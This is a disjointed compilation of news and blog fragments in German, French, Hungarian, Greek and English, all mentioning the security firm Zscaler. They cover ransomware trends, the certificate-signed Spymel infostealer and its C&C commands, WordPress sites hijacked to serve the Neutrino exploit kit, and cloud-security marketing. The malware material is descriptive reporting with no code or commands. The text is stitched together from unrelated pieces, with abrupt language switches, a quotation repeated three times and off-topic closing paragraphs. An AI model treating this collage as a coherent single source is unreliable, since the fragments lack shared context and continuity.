Die Idee, Sicherheits-Appliances in einem Datencenter zu installieren, um die Mitarbeiter zu schützen, stammt aus den 1990er Jahren – und ist überholt. Statt an einem festen Arbeitsplatz sitzen diese nämlich heute zum Beispiel mit ihren Laptops in Cafés und arbeiten über die Cloud. Herkömmliche Sicherheits-Appliances sind nicht nur Altlasten aus traditionellen Standortkonzepten, sie engen den Geschäftsalltag ein, anstatt ihn zu fördern. Zudem sind sie oft nur für eine einzige Sicherheitsfunktion gebaut. Dadurch sprießen neue Appliances in den Datenzentren nur so aus dem Boden – für jede neue Bedrohung ein neues Gerät. Und jedes einzelne muss gekauft, installiert, gewartet und aktualisiert werden.
There Goes The Neighborhood — Bad Actors on GMHOST Alexander Mulgin Serginovic (Zscaler Threat Lab)
En 2016, les ransomware devraient de plus en plus toucher le monde de l’entreprise et il y a fort à parier que ces dernières devront s’acquitter de sommes nettement plus élevées que les particuliers. En effet, les criminels qui mènent ces campagnes de racket ne sont pas nés de la dernière pluie, et lorsqu’ils se rendent compte qu’ils ont verrouillé un code source et des documents financiers qui n’ont pas été correctement sauvegardés, vous pouvez avoir la certitude que le montant demandé pourra être des plus excessifs.
“Users are all too willing to begrudgingly pay an expensive but not excessive ransom in exchange for the return of their precious data,” Sutton says. “Even the FBI are recommending that it’s easier to pay than fight. The wildly profitable CryptoLocker has attracted many clones since it was largely knocked offline following Operation Tovar.” Many of these clones, including more popular variants such as CryptoWall and TorrentLocker largely followed the proven formula, but we’re starting to see variations such as mobile and Linux focused ransomware. “The latter is especially important as it’s more likely to impact the websites and code repositories of enterprises, who in our experience are also very willing to pay up rather than risk losing critical intellectual property,” says Sutton.
“The digital certificate will give a false sense of authenticity to the end user especially when the certificate belongs to a legitimate software vendor,” said Deepen Desai, director of security research at Zscaler. “This approach also helps malware authors in evading detection as it is common for security vendors to bypass advanced heuristic checks for payloads that are signed using legitimate trusted certificates,” he said. Although such techniques have been used in the past to install spyware and adware payloads, it is a relatively new trend when it comes to malware.
Az elmúlt évben két jelentősebb hibát is kiszűrtek a rendszerben. Tavaly augusztusban a Zscaler
kutatói figyeltek fel arra, a WordPress egyik biztonsági hibáját kihasználva az ilyen
weboldalakon keresztül terjesztették tömegesen a Neutrino exploit kitet. Ez a kiberbűnözők
egyik legfelkapottabb exploitja, amelybe nagyon gyorsan belekerül minden új lehetőség, amivel
akár a nulladik napi sérülékenységek is kihasználhatók.
In August, according to Zscaler security firm, cybercriminals compromised more than 2,600 WordPress websites and deployed malicious iframes on 4,200 distinct pages. The criminals exploited vulnerable versions of WordPress 4.2, and prior, to plant the iframes which were used to redirect users to domains hosting the Neutrino exploit kit. The Neutrino landing page was designed to exploit Flash Player vulnerabilities in order to serve the last variant of the popular ransomware CryptoWall 3.0.
As Deepen Desai, director of security research at Zscaler explained, “The digital certificate will give a false sense of authenticity to the end user especially when the certificate belongs to a legitimate software vendor. This approach also helps malware authors in evading detection as it is common for security vendors to bypass advanced heuristic checks for payloads that are signed using legitimate trusted certificates,” he said.
“There are a lot of security vendors who do not perform SSL inspection. You have to do SSL man in the middle inspection,” Zscaler head of security research Deepen Desai told SCMagazine.com. “A lot of these advanced attacks are multi-stage attacks trying to exploit this scenario.” Once executed, the code logs user keystrokes and prevents the user from terminating the malware through system tools like TaskMgr, Procexp, ProcessHacker and Taskkill.
Η Zscaler, ένας πωλητής προϊόντων ασφάλειας στον κυβερνοχώρο με έδρα τις ΗΠΑ, ανακάλυψε ένα νέο trojan, το οποίο εξαπλώνεται μέσω spam e-mail και χρησιμοποιεί ψηφιακά πιστοποιητικά για να μολύνει τους υπολογιστές και να περάσει απαρατήρητο από τα προϊόντα ασφάλειας. Ονομάζεται Spymel και αυτό το trojan φτάνει πρώτα στους υπολογιστές ως ένα συμπιεσμένο αρχείο που επισυνάπτεται σε e-mail.
Zscaler found that the C&C server may send a host of commands to infected machines. These include collecting information about the infected system and the files found on it, as well as deleting, executing or renaming a specified file. A specified file can be uploaded to the C&C and so can a screenshot of the desktop. Enabling or disabling video recording can also be performed.
Besides using digital certificates to hide from antivirus software, Spymel also has some extra tricks up its sleeve. The trojan comes with a module called ProtectMe, which, when loaded, has the ability to prevent the user from terminating the malware's process via the taskkill shell command and tools like Process Explorer, Task Manager, and Process Hacker. Zscaler researchers say that Spymel's C&C server is located somewhere in Germany, at android.sh (184.108.40.206), on port 1216. This is probably a rented server, and its owner's real location is somewhere else.
There’s a wide range of commands that SpyMel supports, basically giving full backdoor control to the remote attacker. They can browse through files, rename files, delete files and send out an update to install on the victim machine. Many banking sites display an interactive keyboard or keypad that can be used to enter credentials or pin code—SpyMel’s video recording feature will allow the attackers to compromise those credentials as well. It’s targeting the Web browsers. This particular malware arrives via spam email and all Windows users are a target. Once a particular system has been compromised, it can lead to more targeted attack since the victim has been identified by the attacker.
“The digital certificate will give a false sense of authenticity to the end user especially when the certificate belongs to a legitimate software vendor,” says Deepen Desai, director of security research at Zscaler. “This approach also helps malware authors in evading detection as it is common for security vendors to bypass advanced heuristic checks for payloads that are signed using legitimate trusted certificates,” he said.
In late December, security experts at Zscaler ThreatLabZ detected a new infostealer malware family dubbed Spymel that uses stolen certificates to evade detection. “ThreatLabZ came across yet another malware family where the authors are using compromised digital certificates to evade detection. The malware family in this case is the information stealing Trojan Spymel and involved a .NET executable signed with a legitimate DigiCert issued certificate.” states a blog post published by Zscaler.
“The malware monitors application like Task Manager, Process Explorer, and Process Hacker. It uses GetForegroundWindow() API to get the handle of active window and changes it's functionality if process is from the above list,” Zscaler researchers explained. Attackers can use the C&C server to send various commands to the malware, including for collecting information about the infected system and the files found on it, deleting, executing or renaming a specified file, uploading a specified file to the C&C, capturing a screenshot of the desktop, and enabling or disabling video recording.
With more than 140 million downloads, WordPress is the most popular CMS on the Web, but it’s also the most attacked. It’s not uncommon for malicious actors to exploit vulnerabilities in both WordPress itself and various plugins. In August, security firm Zscaler reported that thousands of WordPress websites had been compromised and abused to redirect visitors to Neutrino exploit kit sites set up to serve malware.
Deutsche Unternehmen fragen verstärkt nach einer effizienten Lösung für die Sicherheit von Unternehmensdatenverkehr im Internet für alle Mitarbeiter, unabhängig von deren Standort – das berichtet EBF. Genau diesen Bedarf will das Kölner Beratungs- und Softwarehaus jetzt adressieren und hat dafür ein Partnerschaftsabkommen mit dem Security-Anbieter Zscaler unterzeichnet.
ThreatLabZ came across yet another malware family where the authors are using compromised digital certificates to evade detection. The malware family in this case is the information stealing Trojan Spymel and involved a .NET executable signed with a legitimate DigiCert issued certificate.
Password reuse attacks will begin to decline, thanks in large part to the smartphone, said Zscaler CISO Michael Sutton. "Smartphones can be many things but they make for a handy, secure, always with you, data repository. As such, people are starting to adopt password managers such as 1Password and LastPass and other user friendly smartphone apps that present a convenient option for always having sensitive data such as passwords within easy reach," he said.
American business magnate, Warren Buffet once said, “it takes twenty years to build a reputation and five minutes to ruin it. If you think about that you’ll do things differently.” Hot on the heels of the fallout from the TalkTalk hack, for many organisations and their Chief Information Security Officers (CISOs) in particular, that stark reality rings true. Doing things differently in relation to data security strategy is no longer a project for the wish-list, but a boardroom priority.
A quick sort of the cybercorns listed identifies those that deliver value as a cloud service: Okta, Zscaler, CloudFlare and Illumio deliver products and technologies form-factored for the cloud, paid for on a subscription basis, that are easy to adopt, sticky (valuable) and non-intrusive in traditional IT operations.